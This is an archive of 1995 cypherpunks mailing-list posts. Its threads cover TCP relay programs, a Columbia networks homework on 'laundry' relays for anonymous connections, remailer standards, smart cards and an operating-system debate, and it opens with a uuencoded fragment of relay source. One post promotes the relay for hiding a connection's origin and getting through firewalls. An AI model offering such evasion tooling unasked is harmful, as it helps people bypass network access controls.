M96%D*&9D+"9C+#$I.VEF("AW/C`I('=R:71E*')E;6]T969D+"9C+#$I.RHO
M"B`@("`O*G(]<F5A9"AR96UO=&5F9"PF8RPQ*3MI9B`H<CXP*2!W<FET92AF
M9"PF8RPQ*3LJ+PH@("`@=SUR96%D*&9D+&)U9F9E<BPQ,#(T*3MI9B`H=SXP
M*0H@("`@>PH@("`@("!O/3`["B`@("`@('=H:6QE*&\\=RD@;SUW<FET92AR
M96UO=&5F9"QB=69F97(K;RQW+6\I.PH@("`@?0H@("`@<CUR96%D*')E;6]T
M969D+&)U9F9E<BPQ,#(T*3MI9B`H<CXP*0H@("`@>PH@("`@("!O/3`["B`@
M("`@('=H:6QE*&\\<BD@;SUW<FET92AF9"QB=69F97(K;RQR+6\I.PH@("`@
L?0H@('T*"B`@8VQO<V4H<F5M;W1E9F0I.PH@(&-L;W-E*&9D*3L*("`*?0H@
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Sun, 29 Jan 95 15:01:09 PST
To: cypherpunks@toad.com
Subject: Telnet Acrobatics
Message-ID: <m0rYies-0006U0C@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


BTW, usage is

socket <portnumber> command
relay <hostname> <postnumber>

You can combine them to make a telnet relay/forwarded with:

socket <localport> relay <hostname> <remoteport>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.sinet.org (Anonymous)
Date: Sun, 29 Jan 95 15:26:58 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: CERN Web Proxy
In-Reply-To: <Pine.SUN.3.91.950129150751.28793B-100000@bach.seattleu.edu>
Message-ID: <m0rYj3r-0006U8C@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


random walk <pfinerty@seattleu.edu> wrote

> here it is...
> 
> CERN = http://www.cern.ch:911

Error 403

Forbidden - by rule 


CERN httpd 3.0




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 29 Jan 95 18:46:12 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Specs
Message-ID: <ab5202cf020210040e81@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


>In article <Pine.SUN.3.91.950128194321.1158A-100000@unix2.netaxs.com>
>grendel@netaxs.com (Michael Handler) writes:
>>On Sat, 28 Jan 1995, Rhys Kyraden wrote:
>>
>>>         Since I have begun the project of writing the Remailer for the Mac,
>>> I suddenly realized that I do not know exactly what is expected of it, and
>>> therefore would like some pointers to the specs of a remailer (I have seen
>>> references to padding and splitting but do not know what this is nor how to
>>> implement it.)
>>
>>       I've started work on a formal remailer standards document that
>>describes just how a Cypherpunk Type I remailer should process messages,
>>with full header descriptions, etc. After I've checked it against the
>>behaviors of all the various Cypherpunk remailer packages (Ghio vs Eric
>>Hollander vs Sameer vs Mixmaster in compatibility mode vs whatever else),
>>I'll post it here for comments.
>
>Cypherpunk Type I?  Ok, what are the other types?  Should there be a
>type specification like there is for RAID, or the Body Armor Threat
>levels?
>
<SNIP>
>---------------------------------------------------------|
>| #include "std/disclaimer.h"     Michael P. Brininstool |
>| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
>|---------------------------------------------------------

He spicifies type 1 to differentiate it from what I have been calling type
2,the message format used by mixmaster remailers.

Essay on Mixmaster available on my WWW page.

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.techwood.org>
Date: Sun, 29 Jan 95 18:48:09 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.ULT.3.91.950129195932.7990A-100000@krypton.mankato.msus.edu>
Message-ID: <199501300247.SAA06181@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text


> > The only real barrier left to UNIX becoming the OS of choice is 
> > commercial app support (things like word processors and etc. becoming 
> > readily available and inexpensive).
> 
> I agree.  If I could get a WYSIWYG word processor for X that was as 
> robuse as MS Word or Wordperfect, I'd be a very camper.

You can.  Wordperfect comes in X flavors.  Be a happy camper.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 29 Jan 95 15:58:54 PST
To: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Subject: Re: Telnet Acrobatics
In-Reply-To: <m0rYiZL-0006TuC@myriad.pc.cc.cmu.edu>
Message-ID: <199501300002.TAA29052@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>What follows are two small programs which I thought might be of interest to
>cypherpunks.  The first (socket.c) is a simple daemon which binds a port
>and accepts connections, and then forks child processes for each one.
>The second (relay.c) is a simple telnet program which opens a connection to
>the specified remote host and port number.  Put together they can be used
>as a telnet relay ("proxy server") that works like the term redir command.
>This in itself is useful, if you want to hide where you're coming in from,
>bypass a broken router or get through a firewall.  But, take a look at the
>loop at the end of the second program.  It simply reads input from one
>socket and writes it to another.  It would seem to me very easy to add
>an encryptor/decryptor to this process and encrypt your telnet sessions.
>You'd just need to exchange a key (via PGP) with the remote system, and
>decide on a port number, then run crypt/dec daemons on both systems.  The
>socket.c program might also be useful for socket-based remailing.  (Tho
>you can set it up in your inetd.conf instead, if you have root access.)

...

This is really funny - these programs are almost *exactly* the first
assignment in the computer networks class that I taught at Columbia last
Spring.  I think these may actually be modified versions of one of the
submissions from one of the students in the course.  (The actual assignment
called for something slightly different from these two programs, but close
enough to make it easy enough to modify.  Assignment sheet attached below
for reference...)

By the way, speaking of encrypted sessions, I'm currently shaking the
bugs out of "esp", an application-level encrypted session manager for Unix
terminal sessions across untrusted networks.  It's based on RSAREF
and 3-DES, and I expect to release it next week or so.  Stay tuned.

-matt

========== assignment1.ms (troff -ms format) attached below ===============
.nr FM 1i
.nr HM .75i
.nr LL 6.9i
.nr PO .85i
.OH ""
.EH ""
.TL
Homework #1: TCP Laundry Service
.AU
CS 4119 - Computer Networks
.AI
Assigned: Thursday, January 27, 1994
Due: Sunday, February 13, 1994, Midnight
.NH
The Problem
.PP
One of the features of the TCP/IP protocol suite is that two communicating
entities each need to know the network address of the other.  In general,
this is a useful property; it makes it possible, for example, for a server
to use the network address of clients who connects to it as part of an
authentication protocol.  An example of this is the
.I rlogin
protocol, in which the server machine uses the network address from which
a request originates to determine whether to ask for a password before letting
the user log in.  (It is worth understanding how this works, by the way,
and the inherent risks of relying on the network for authentication).
.PP
Sometimes, however, it is desirable to offer completely
.I anonymous
services in which the server has no way to determine where a connection to
it originates.  For example, it may be useful to provide the ability for
informants to send anonymous electronic mail to news reporters or law
enforcement agencies.
.PP
Unfortunately, the Internet Protocol (IP) suite does not provide for
anonymous communication.  One way to simulate anonymous communication is
to make use of intermediate "data laundry" servers, whose sole purpose is
to relay traffic between its sources and destinations.  Data laundries derive
their name from the criminal practice of "money laundering", where a
criminal moves his or her loot between several businesses and banks in an
effort to obscure the connection between stealing the money and spending it.
A data laundry accepts connections from clients (or other
laundries) and connects them to whatever remote service (or laundry) they
wish to communicate with.  Since the final destination thinks it is
communicating with the laundry, the only way to determine the real origin
of a connection would be to compromise the security of each of the laundries
along the way.
.NH
The Assignment
.PP
Your job is to build a laundry service for TCP connections.  This should
consist of two parts: a
.I "laundry daemon"
which connects clients to services and a
.I "laundry client"
which provides a convenient front end to users of the service.
Also write a short manual describing how to use your programs.
.NH 2
Laundry Daemon
.PP
The laundry daemon should accept TCP connections on a pre-selected port
number (pick one that isn't already used by some existing service).  When
a connection comes in, it should \fCfork\fP a subprocess for the duration
of the connection and print a message announcing that it is ready:
.DS
\fC100 cs.columbia.edu laundry service ready\fP
.DE
All messages from the daemon should consist of single lines of ASCII text
starting with a three digit number and followed by an informational message.
Messages numbers starting with 1 indicate success, message numbers starting
with 2 indicate failure.
.PP
Once the initial ready message is transmitted to the client, the server should
accept a single line of text containing a destination hostname followed by
at least one space followed by a port identifier.  Both the hostname and
port ID should be able to be specified by either their official names
or by their decimal values; you may assume that any identifier starting with a
digit is a numeric, otherwise it is a name.  Examples of valid input:
.DS
\fCcunix.cc.columbia.edu finger
128.59.40.11    79
128.59.40.11   telnet\fP
.DE
The server should then attempt to open a TCP connection to the given
host/port.  If the connection fails for any reason (host unreachable,
name lookup failure, etc.), the server should send an appropriate error
message to the client, e.g,:
.DS
\fC201 cunix.cc.columbia.edu connection refused on port finger\fP
.DE
Otherwise, the server should send a message indicating success:
.DS
\fC101 connected to cunix.cc.columbia.edu port finger\fP
.DE
.PP
Once the connection is established, the daemon should simply relay 
the all traffic between the source and destination.  If an error occurs
or the connection to either side of the connection closes, the daemon
should close both sides of the connection and terminate the subprocess.
.PP
Your laundry daemon should be able to handle arbitrarily many connections
simultaneously.  In particular, it should be possible to launder connections
through itself.
.NH 2
Laundry Client
.PP
The laundry client provides a convenient front end to users of the laundry
service.  Its job is to read, from a configuration file, a list of
laundry servers (and the TCP port numbers they run on) followed by
a final destination and port number.  For example:
.DS
\fCa.columbia.edu 10000
b.columbia.edu.edu 10000
cunix.cc.columbia.edu telnet\fP
.DE
would launder a TCP connection to the telnet port of cunix.cc.columbia.edu
through laundry servers running on port 10000 of a.columbia.edu and
b.columbia.edu.
.PP
Once the connection is established, the laundry client should simply connect
its standard input and standard output to the laundered connection.  Upon
EOF at either the remote connection or the standard input, the client
should close the connection and terminate.
.PP
If the connection fails any any point along the laundered path,
the client should print an appropriate error message and terminate.
.NH
Hints
.PP
You'll need to be familiar with the system calls for establishing TCP
connections (socket, connect, bind, etc.), the routines for looking up
host and service names (gethostbyname, etc.), the system calls for
manipulating terminal IO (ioctl), and the system call for multiplexing
input streams (select).
.PP
A common source of errors is to try to bind your service to a port already
in use by another process.  Make sure the port number you're using is
not already in use.  Also, make sure you kill any laundry daemons you've
started when you're done testing your program.
.NH
Extra Credit Ideas
.PP
Make the laundry service fully compatible with the telnet protocol.
.PP
Extend your service to provide encrypted connections. (You'll want to
learn about key exchange protocols.  You'll find the RSAREF library,
available at the rsa.com ftp site, helpful.)
.PP
Extend the laundry service to allow laundered servers as well as clients;
that is, allow a service to set up and accept connections through a chain
of proxy servers.
.PP
For lots of extra credit, make your code available and convince lots of
people to adopt it as a standard.  (This is more work than it's worth!).
.NH
Policy
.PP
Your program will be graded based on whether it works according to the
assignment, how well it handles errors, and the quality of your
documentation and code.
Turn your programs in with the submit program; your TAs will have information
on how to use this.
Late programs will be accepted, but with a reduced grade.  Late programs
cannot get extra credit.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 17:29:07 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.3.89.9501291649.A14175-0100000@netcom5>
Message-ID: <Pine.SGI.3.91.950129192639.2535A-100000@sgi7.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, James A. Donald wrote:

> On Sat, 28 Jan 1995, Joe Turner wrote:
> > Additionally, I don't know of too many operating 
> > systems where the source code is floating around.  I mean so what if 
> > it doesn't come with a pretty shrink wrapped package and a thick 
> > getting-started, if you have a question just go find the source code.  
> > Geez.  
> 
> There are some communities of software developers that have 
> this strange belief that program behavior should conform to user
> expectations instead of the user conforming to the program
> behavior.
> 
> 
> Your other remarks are rational, relevant, appropriate, and correct,
> but this remark illustrates magnificently why unix is
> still user hostile after all these years.

UNIX?  user hostile?  where have you been lately?  ever hear of X 
windows?  Indigo Magic Desktop?  these and zillions of other innovations 
have made UNIX more user-friendly than any other operating system I have 
used (which includes DOS, Windows, OS/2, and NeXTstep, among others).  
The only real barrier left to UNIX becoming the OS of choice is 
commercial app support (things like word processors and etc. becoming 
readily available and inexpensive).

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Sun, 29 Jan 95 16:47:19 PST
To: cypherpunks@toad.com
Subject: Re: Telnet Acrobatics
In-Reply-To: <199501300002.TAA29052@crypto.com>
Message-ID: <Qj=3ONS00VolECjl4T@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> This is really funny - these programs are almost *exactly* the first
> assignment in the computer networks class that I taught at Columbia
> last Spring.

These programs are pretty much textbook examples of socket usage, so
it's not too surprising, but that is kindof funny.  I doubt they were
actually copied out of a textbook; as they both had bugs in them, but I
think I have most of the bugs fixed now.  One that I didn't see earlier
when I posted that is that the select loop is missing an
if(FD_ISSET(fd,&readfds)....  It works without it, but not smoothly.  I
found these posted to alt.2600 last summer and they've been sitting on
my hard disk until this weekend when I pulled them out and started
playing with them.

Did any of your students try for the extra credit and add encryption?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 29 Jan 95 18:03:53 PST
To: Spif <c642011@cclabs.missouri.edu>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.SGI.3.91.950129192639.2535A-100000@sgi7.phlab.missouri.edu>
Message-ID: <Pine.ULT.3.91.950129195932.7990A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, Spif wrote:

> UNIX?  user hostile?  where have you been lately?  ever hear of X 
> windows?  Indigo Magic Desktop?  these and zillions of other innovations 
> have made UNIX more user-friendly than any other operating system I have 
> used (which includes DOS, Windows, OS/2, and NeXTstep, among others).  

Sorry, I need to disagree here.   The first time I tried to configure X 
for my Linux system, it barfed.  It also spewed on several subsequent 
attempts, and this is with pretty standard hardware.  I finally found an 
X guru locally and he fixed it for me.  At the very least, Windoze and 
OS/2 and NeXT give you graphics out of the box, with no need to spend 
several hours configuring it just to get basics up, and no need to try to 
find some kind of user-oriented documentation to guide you through these 
hassles. 

Now, I like Linux/Unix a lot.  It is really one of the better OSes out 
there, but it isn't very friendly for the person that doesn't know what 
they are doing, especially to configure basic apps.

> The only real barrier left to UNIX becoming the OS of choice is 
> commercial app support (things like word processors and etc. becoming 
> readily available and inexpensive).

I agree.  If I could get a WYSIWYG word processor for X that was as 
robuse as MS Word or Wordperfect, I'd be a very camper.

____        Robert A. Hayden       <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-          <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info  <=>     I am Pentium of Borg
   \/   Finger for PGP Public Key  <=>   you will be approximated





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 18:16:10 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.ULT.3.91.950129195932.7990A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SGI.3.91.950129200624.2535E-100000@sgi7.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, Robert A. Hayden wrote:

> On Sun, 29 Jan 1995, Spif wrote:
> 
> > UNIX?  user hostile?  where have you been lately?  ever hear of X 
> > windows?  Indigo Magic Desktop?  these and zillions of other innovations 
> > have made UNIX more user-friendly than any other operating system I have 
> > used (which includes DOS, Windows, OS/2, and NeXTstep, among others).  
> 
> Sorry, I need to disagree here.   The first time I tried to configure X 
> for my Linux system, it barfed.  It also spewed on several subsequent 
> attempts, and this is with pretty standard hardware.  I finally found an 
> X guru locally and he fixed it for me.  At the very least, Windoze and 
> OS/2 and NeXT give you graphics out of the box, with no need to spend 
> several hours configuring it just to get basics up, and no need to try to 
> find some kind of user-oriented documentation to guide you through these 
> hassles. 

XFree86 was a snap to set up on my system, and I'm no guru.  In addition, 
Linux does not occupy the entirety of the UNIX spectrum - SGI systems, 
for example, give you graphics "out of the box", and so do many other 
workstation systems.  Granted, such machines are more expensive, but then 
we're talking about ease-of-use and power here, not cost.

> Now, I like Linux/Unix a lot.  It is really one of the better OSes out 
> there, but it isn't very friendly for the person that doesn't know what 
> they are doing, especially to configure basic apps.

I'm not a UNIX guru, as I said, although I do have some basic UNIX 
knowledge.  Slackware was, for me, one of the easiest installations I 
have ever done on any computer.  It was a breeze.

> > The only real barrier left to UNIX becoming the OS of choice is 
> > commercial app support (things like word processors and etc. becoming 
> > readily available and inexpensive).
> 
> I agree.  If I could get a WYSIWYG word processor for X that was as 
> robuse as MS Word or Wordperfect, I'd be a very camper.

in fact, there are version of Wordperfect (and perhaps MS Word as well) 
for UNIX systems... they're just more expensive and less immediately 
available in the marketplace.

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Sun, 29 Jan 95 20:28:53 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
Message-ID: <199501300427.UAA21533@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>The only real barrier left to UNIX becoming the OS of choice is 
>commercial app support (things like word processors and etc. becoming 
>readily available and inexpensive).

I don't mean to toss gasoline onto this fire, but......

Unix as we know has a vanishingly small probability of ever becoming 
'mainstream'. There's a two-orders-of-magnitude gap between the installed 
base of Dos/Windows and that of Unix. That gap has grown, not marrowed 
over time. This is however no reflection on the obvious technical merits 
of Unix. Market dominance is based not on technical superiority, but 
rather on technical sufficiency. Once an OS acheives technical 
sufficiency any further technical improvements will have a diminishing 
marginal effect on that OS's market performance. Once the OS is 
technically sufficient, non-technical factors begin to dominate. The 
market failure of WinNT is a classic example of this. Its failure is 
unrelated to its technical merits (or lack thereof), but rather on 
econmic and social factors the even a company withe the marketing muscle 
of MicroSoft has not yet been able to overcome. (OS/2 is of course an 
example of an even more dismal, perhaps terminal, failure for many of the 
same reasons.)

Dale H.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 29 Jan 95 21:23:25 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
Message-ID: <199501300522.VAA17151@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Spif wrote:
>UNIX?  user hostile?  where have you been lately?  

Well, maybe unix gets its reputation for being hostile because of
things like 

* many commands don't work fully (find, for example)
* a large portion choke on input that isn't "expected"
* many more do extremely poor input checking,
* the configuration files are bizarre
* different version have command with different options (stty
  everything, ps -ef vs. ps -aux, etc.)
* each version is slightly different (ever try porting a non-trivial
  program?  Look at some available large software and examine the #ifdef
  #define #endif statements; look at the differences in system calls.
  Hell, look at the "config" program that comes with PERL - 80K of stuff
  to build a make file for the flavor of UNIX you are using!)
* the commands don't combine well (often uuencode + sendmail ==
  garbage)
* many commands accept a slightly different regular expression syntax
  than the shell does
* the commands aren't built with ease of use in mind.  For example, to
  kill a process under unix requires that I know it's process id.  How
  do I find that?  Run another command...

> ever hear of X windows?

X-Windows is an extreme pain to get working.  Sure, if you buy your
unix workstation the manufacturer will pre-install it.  Just try
setting it up from scratch.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 29 Jan 95 18:34:44 PST
To: "Michael P. Brininstool" <mikepb@freke.lerctr.org>
Subject: Re: Remailer Specs
In-Reply-To: <1995Jan29.153057.11745@freke.lerctr.org>
Message-ID: <Pine.SUN.3.91.950129213242.15218A-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, Michael P. Brininstool wrote:

> Cypherpunk Type I?  Ok, what are the other types?  Should there be a
> type specification like there is for RAID, or the Body Armor Threat
> levels?

	Currently? Only Mixmaster AKA Cypherpunk Type II. This is part of 
why an official standards document is needed. My specs will include the 
start of an `official' type specification.

[ snip ]
> Should we come up with a similar type of graduated system, and specs
> for each, with some kind of negotiation between remailers, so that they
> can determine what levels to use to communicate with various
> remailers?
> Then we could talk in terms of type 6, for example, having all the
> abilities of levels 1-5 and then some.

	Not a bad idea. I'll see what I can do.

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 29 Jan 95 21:40:08 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
Message-ID: <199501300539.VAA18044@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Spif wrote:
>so your point, basically, is that the public will settle for whatever it 
>can get, and get easiest and cheapest, when it comes to software and 
>operating systems in particular.  

It always puzzles me that people on the net spend so much time griping
about Microsoft when the net tends towards libertarianism.  I would
think libertarians would welcome Microsoft's dominance, as a
validation of the free market in action.

I'm not saying you are libertarian, of course.

"Dos/Windows + applications available for Dos/Windows" are obviously
blowing out "unix + applications available for unix".

Normal people don't give a damn if source code is available for "power
tools" like PERL, sed, grep, wc, bc, strip, yacc, lex, puke, barf,
etc.

They want to cut and paste their spreadsheet charts into the word
processor they use, and email it to coworkers.

>certainly a growing market for internet-capable systems

OS/2 is internet friendly, Windows 95 will be friendly, etc.
Certainly unix will let you do more, but most people won't care about
the value of the extras, as long as a web browser, news reader, and
mail reader is available.

Some people on this list swear they never have to drop to a command
line with the cool tools they use with their SLIP accounts (except to
change their password).  If that's true, then any "advantage" unix has
is washed away.  How will the unix market grow (relative to other more
popular OS's) if internet access tools run the same on Windows and
OS/2 and Mac's as they do on unix?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sun, 29 Jan 95 22:28:09 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Smart Card architecture
Message-ID: <Chameleon.4.01.950129222758.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've been searching around the 'net looking for online references to
the actual protocols and methods used in smart card user authentication,
but have found very little.  I understand from reading Schneier that
there are several established protocols to demonstrate knowledge of
some secret without leaking any information about this secret.  Is this
how these (smart card) systems work?

The Nov. '94 issue of 'Communications of the ACM' has an article about
using smart cards to store secure OS kernel and user configuration
information (I imagine both Unix _and_ Windows :), which is fascinating to 
read, but doesn't delve into these technical details.

It seems that the there are a myriad of rather innovative applications for 
these things.

What is the state of this technology today?  I understand there are working 
systems for use with credit transactions and telephone billing.  Who are the 
major players in the marketplace, what types of standards have evolved to 
describe the interfaces they use, and what kind of Cypherpunk interest is
there in these products?  What kind of realistic attacks exist that would
compromise the security offered by smart cards?

Guess I'm just interested in some good pointers to information (online or 
written) that could give me a grasp on the technical details.

Thanks,

Johnathan Corgan

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyyGmk1Diok8GKihAQE6MQP/dPRmR4X8p459WvgwTiiL+zO/oq1zyE2E
KxD/1JEQ4e6MC7tGNiPktvXqFXtv5JgXxbPhWkUZTQjkEyMulDCv2h0hUGySdiHx
Zq4lvCtCRRdb6r5O+tQJQpCbCW3NRsx3A6yJPK2YvH1lYRciDlMdWDQyGAGefuUN
xO6jMEGnGEw=
=9RjV
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Sun, 29 Jan 95 22:32:04 PST
To: cypherpunks@toad.com
Subject: alt.religion.your.operating.system.sucks
Message-ID: <199501300630.WAA29275@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>so your point, basically, is that the public will settle for whatever 
>it can get, and get easiest and cheapest, when it comes to software and 
>operating systems in particular.  

I think you've grasped the fundementals!  You'll soon make VP of 
Marketing. <g>



>This may be the case, but there is certainly a growing market for 
>internet-capable systems, and the most internet-friendly OS around is, 
>of course, UNIX.  

OS/2 comes internet-ready and pre-installed and it's still an almost 
complete failure in the market.



>In that fact, and in the growing importance of having an OS that 
>utilizes the full capabilities of increasing powerful personal 
>computers, lies the future of UNIX.

In any mature market, technical superiority above some baseline level of 
sufficiency has no market value.  The auto market is a classic example 
of this. Look how long tail-fins and chrome have dominated technical 
superiority as the prime focus of marketing.  These are all marketing 
issues not technical issues!

Dale H.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 29 Jan 95 19:34:04 PST
To: "Craig A. Johnston" <caj@tower.techwood.org>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300247.SAA06181@tower.techwood.org>
Message-ID: <9501300333.AA22987@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Craig A. Johnston" says:
> > I agree.  If I could get a WYSIWYG word processor for X that was as 
> > robuse as MS Word or Wordperfect, I'd be a very camper.
> 
> You can.  Wordperfect comes in X flavors.  Be a happy camper.

Not to mention IslandWrite, Applix, and other things...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 29 Jan 95 22:35:03 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
Message-ID: <v01510102ab5233825e8e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:39 PM 1/29/95, anonymous-remailer@shell.portal.com wrote:

>Some people on this list swear they never have to drop to a command
>line with the cool tools they use with their SLIP accounts (except to
>change their password).  If that's true, then any "advantage" unix has
>is washed away.  How will the unix market grow (relative to other more
>popular OS's) if internet access tools run the same on Windows and
>OS/2 and Mac's as they do on unix?

It is true, I swear <g>

I am a Mac person. UNIX is pretty far from the Mac OS. Nonetheless, I am
about to buy a cheap 486 (any recomendations?) on which I will install
FreeBSD to run an Internet server. Once Apple will officially relase their
dirt cheap multi-processor servers that run A/UX only, I'll probably buy
one of those. Why am I getting a UNIX machine? Because there is nothing out
there in world of operating systems that does the job as well as UNIX when
it comes to networking.


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 20:44:00 PST
To: Dale Harrison <daleh@ix.netcom.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300427.UAA21533@ix3.ix.netcom.com>
Message-ID: <Pine.SGI.3.91.950129224046.3652D-100000@sgi7.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, Dale Harrison wrote:

> You wrote: 
> 
> >The only real barrier left to UNIX becoming the OS of choice is 
> >commercial app support (things like word processors and etc. becoming 
> >readily available and inexpensive).
> 
> I don't mean to toss gasoline onto this fire, but......
> 
> Unix as we know has a vanishingly small probability of ever becoming 
> 'mainstream'. There's a two-orders-of-magnitude gap between the installed 
> base of Dos/Windows and that of Unix. That gap has grown, not marrowed 
> over time. This is however no reflection on the obvious technical merits 
> of Unix. Market dominance is based not on technical superiority, but 
> rather on technical sufficiency. Once an OS acheives technical 
> sufficiency any further technical improvements will have a diminishing 
> marginal effect on that OS's market performance. Once the OS is 
> technically sufficient, non-technical factors begin to dominate. The 
> market failure of WinNT is a classic example of this. Its failure is 
> unrelated to its technical merits (or lack thereof), but rather on 
> econmic and social factors the even a company withe the marketing muscle 
> of MicroSoft has not yet been able to overcome. (OS/2 is of course an 
> example of an even more dismal, perhaps terminal, failure for many of the 
> same reasons.)

so your point, basically, is that the public will settle for whatever it 
can get, and get easiest and cheapest, when it comes to software and 
operating systems in particular.  This may be the case, but there is 
certainly a growing market for internet-capable systems, and the most 
internet-friendly OS around is, of course, UNIX.  In that fact, and in 
the growing importance of having an OS that utilizes the full 
capabilities of increasing powerful personal computers, lies the future 
of UNIX.

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
